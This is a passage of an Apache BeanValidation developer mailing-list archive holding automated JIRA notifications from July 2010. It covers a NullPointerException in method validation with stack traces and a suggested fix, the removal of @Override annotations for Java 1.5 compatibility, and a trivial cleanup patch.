org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Jul 04 20:07:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13195 invoked from network); 4 Jul 2010 20:07:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Jul 2010 20:07:15 -0000 Received: (qmail 28599 invoked by uid 500); 4 Jul 2010 20:07:15 -0000 Delivered-To: [email protected] Received: (qmail 28561 invoked by uid 500); 4 Jul 2010 20:07:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28553 invoked by uid 99); 4 Jul 2010 20:07:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 20:07:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 20:07:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o64K6o2L001357 for <[email protected]>; Sun, 4 Jul 2010 20:06:50 GMT Message-ID: <2327120.195131278274010497.JavaMail.jira@thor> Date: Sun, 4 Jul 2010 16:06:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12885075#action_12885075 ] Carlos Vara commented on BVAL-72: --------------------------------- In your before aspect, add: method = clazz.getDeclaredMethod(method.getName(), method.getParameterTypes()); after the line: Method method = methodSignature.getMethod(); Reason is, clazz gets the bean class (not the interface), but method gets the declaration of the interface method, which is abstract. As the signatures differ, the retrieval of the method constraints fails. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:10:21 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3772 invoked from network); 6 Jul 2010 19:10:21 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:10:21 -0000 Received: (qmail 89126 invoked by uid 500); 6 Jul 2010 19:10:21 -0000 Delivered-To: [email protected] Received: (qmail 89089 invoked by uid 500); 6 Jul 2010 19:10:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89081 invoked by uid 99); 6 Jul 2010 19:10:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:10:20 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:10:18 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66J9qov020606 for <[email protected]>; Tue, 6 Jul 2010 19:09:52 GMT Message-ID: <1621110.220981278443392144.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:09:52 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Reopened: (BVAL-70) Remove @Override annotations from methods implementing interfaces In-Reply-To: <31983797.92971277737382980.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-70?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson reopened BVAL-70: ----------------------------- Violated again in r960471. > Remove @Override annotations from methods implementing interfaces > ----------------------------------------------------------------- > > Key: BVAL-70 > URL: https://issues.apache.org/jira/browse/BVAL-70 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Priority: Critical > Attachments: overrides.patch.txt > > > The source level of the bval project as a whole is [email protected]. The best I've been able to determine, 1.6 permits these annotations but 1.5 does not. In particular, Eclipse complains about these, but again, my research seems to bear it out. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:12:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4208 invoked from network); 6 Jul 2010 19:12:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:12:14 -0000 Received: (qmail 92438 invoked by uid 500); 6 Jul 2010 19:12:14 -0000 Delivered-To: [email protected] Received: (qmail 92394 invoked by uid 500); 6 Jul 2010 19:12:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92386 invoked by uid 99); 6 Jul 2010 19:12:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:12:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:12:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JBnqE020619 for <[email protected]>; Tue, 6 Jul 2010 19:11:49 GMT Message-ID: <10660871.221011278443509875.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:11:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-70) Remove @Override annotations from methods implementing interfaces In-Reply-To: <31983797.92971277737382980.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-70?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-70: ---------------------------- Attachment: override-again.patch.txt > Remove @Override annotations from methods implementing interfaces > ----------------------------------------------------------------- > > Key: BVAL-70 > URL: https://issues.apache.org/jira/browse/BVAL-70 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Priority: Critical > Attachments: override-again.patch.txt, overrides.patch.txt > > > The source level of the bval project as a whole is [email protected]. The best I've been able to determine, 1.6 permits these annotations but 1.5 does not. In particular, Eclipse complains about these, but again, my research seems to bear it out. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:18:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5279 invoked from network); 6 Jul 2010 19:18:13 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:18:13 -0000 Received: (qmail 98055 invoked by uid 500); 6 Jul 2010 19:18:13 -0000 Delivered-To: [email protected] Received: (qmail 98014 invoked by uid 500); 6 Jul 2010 19:18:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98006 invoked by uid 99); 6 Jul 2010 19:18:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:18:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:18:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JHnhP020647 for <[email protected]>; Tue, 6 Jul 2010 19:17:49 GMT Message-ID: <7333525.221061278443869486.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:17:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-74) Remove redundant method call from ClassValidator.validateProperty() MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Remove redundant method call from ClassValidator.validateProperty() ------------------------------------------------------------------- Key: BVAL-74 URL: https://issues.apache.org/jira/browse/BVAL-74 Project: BeanValidation Issue Type: Improvement Affects Versions: 0.2-incubating Reporter: Matt Benson Priority: Trivial Patch forthcoming. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:25:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6698 invoked from network); 6 Jul 2010 19:25:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:25:45 -0000 Received: (qmail 4688 invoked by uid 500); 6 Jul 2010 19:25:45 -0000 Delivered-To: [email protected] Received: (qmail 4651 invoked by uid 500); 6 Jul 2010 19:25:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4638 invoked by uid 99); 6 Jul 2010 19:25:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:25:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:25:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JHoaZ020659 for <[email protected]>; Tue, 6 Jul 2010 19:17:50 GMT Message-ID: <9176344.221101278443870430.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:17:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-70) Remove @Override annotations from methods implementing interfaces In-Reply-To: <31983797.92971277737382980.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-70?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12885647#action_12885647 ] Carlos Vara commented on BVAL-70: --------------------------------- Aww, my fault, I mixed the patch in that revision with some code I had for BVAL-73, I fix it in a sec. Thanks a lot for reviewing it Matt. > Remove @Override annotations from methods implementing interfaces > ----------------------------------------------------------------- > > Key: BVAL-70 > URL: https://issues.apache.org/jira/browse/BVAL-70 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Priority: Critical > Attachments: override-again.patch.txt, overrides.patch.txt > > > The source level of the bval project as a whole is [email protected]. The best I've been able to determine, 1.6 permits these annotations but 1.5 does not. In particular, Eclipse complains about these, but again, my research seems to bear it out. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:26:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6805 invoked from network); 6 Jul 2010 19:26:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:26:14 -0000 Received: (qmail 7156 invoked by uid 500); 6 Jul 2010 19:26:14 -0000 Delivered-To: [email protected] Received: (qmail 7130 invoked by uid 500); 6 Jul 2010 19:26:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7121 invoked by uid 99); 6 Jul 2010 19:26:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:26:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:26:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JPnbH020720 for <[email protected]>; Tue, 6 Jul 2010 19:25:50 GMT Message-ID: <2264491.221211278444349675.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:25:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-70) Remove @Override annotations from methods implementing interfaces In-Reply-To: <31983797.92971277737382980.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-70?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-70. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Merged 2nd patch. Not the mixture I thought, but still my fault. I'm definitely including a jdk1.5 test build in my process to avoid this from happening again. > Remove @Override annotations from methods implementing interfaces > ----------------------------------------------------------------- > > Key: BVAL-70 > URL: https://issues.apache.org/jira/browse/BVAL-70 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Priority: Critical > Fix For: 0.2-incubating > > Attachments: override-again.patch.txt, overrides.patch.txt > > > The source level of the bval project as a whole is [email protected]. The best I've been able to determine, 1.6 permits these annotations but 1.5 does not. In particular, Eclipse complains about these, but again, my research seems to bear it out. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:27:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7003 invoked from network); 6 Jul 2010 19:27:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:27:43 -0000 Received: (qmail 9319 invoked by uid 500); 6 Jul 2010 19:27:43 -0000 Delivered-To: [email protected] Received: (qmail 9286 invoked by uid 500); 6 Jul 2010 19:27:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9278 invoked by uid 99); 6 Jul 2010 19:27:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:27:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:27:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JJnna020680 for <[email protected]>; Tue, 6 Jul 2010 19:19:50 GMT Message-ID: <5828482.221121278443989794.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:19:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-74) Remove redundant method call from ClassValidator.validateProperty() In-Reply-To: <7333525.221061278443869486.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-74?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-74: ---------------------------- Attachment: BVAL-74.patch.txt > Remove redundant method call from ClassValidator.validateProperty() > ------------------------------------------------------------------- > > Key: BVAL-74 > URL: https://issues.apache.org/jira/browse/BVAL-74 > Project: BeanValidation > Issue Type: Improvement > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Priority: Trivial > Attachments: BVAL-74.patch.txt > > > Patch forthcoming. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:42:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10007 invoked from network); 6 Jul 2010 19:42:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:42:46 -0000 Received: (qmail 30328 invoked by uid 500); 6 Jul 2010 19:42:45 -0000 Delivered-To: [email protected] Received: (qmail 30196 invoked by uid 500); 6 Jul 2010 19:42:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30085 invoked by uid 99); 6 Jul 2010 19:42:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:42:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:42:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66JYppX020813 for <[email protected]>; Tue, 6 Jul 2010 19:34:51 GMT Message-ID: <19360045.221381278444890992.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:34:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-74) Remove redundant method call from ClassValidator.validateProperty() In-Reply-To: <7333525.221061278443869486.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-74?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-74: ------------------------------- Assignee: Carlos Vara > Remove redundant method call from ClassValidator.validateProperty() > ------------------------------------------------------------------- > > Key: BVAL-74 > URL: https://issues.apache.org/jira/browse/BVAL-74 > Project: BeanValidation > Issue Type: Improvement > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Priority: Trivial > Attachments: BVAL-74.patch.txt > > > Patch forthcoming. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 06 19:51:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11354 invoked from network); 6 Jul 2010 19:51:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Jul 2010 19:51:46 -0000 Received: (qmail 38495 invoked by uid 500); 6 Jul 2010 19:51:46 -0000 Delivered-To: [email protected] Received: (qmail 38335 invoked by uid 500); 6 Jul 2010 19:51:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38303 invoked by uid 99); 6 Jul 2010 19:51:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:51:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jul 2010 19:51:44 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o66Jhrgd020892 for <[email protected]>; Tue, 6 Jul 2010 19:43:53 GMT Message-ID: <23744742.221581278445433116.JavaMail.jira@thor> Date: Tue, 6 Jul 2010 15:43:53 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-74) Remove redundant method call from ClassValidator.validateProperty() In-Reply-To: <7333525.221061278443869486.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-74?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-74. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Merged the patch. Thanks Matt. > Remove redundant method call from ClassValidator.validateProperty() > ------------------------------------------------------------------- > > Key: BVAL-74 > URL: https://issues.apache.org/jira/browse/BVAL-74 > Project: BeanValidation > Issue Type: Improvement > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Priority: Trivial > Fix For: 0.2-incubating > > Attachments: BVAL-74.patch.txt > > > Patch forthcoming. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue 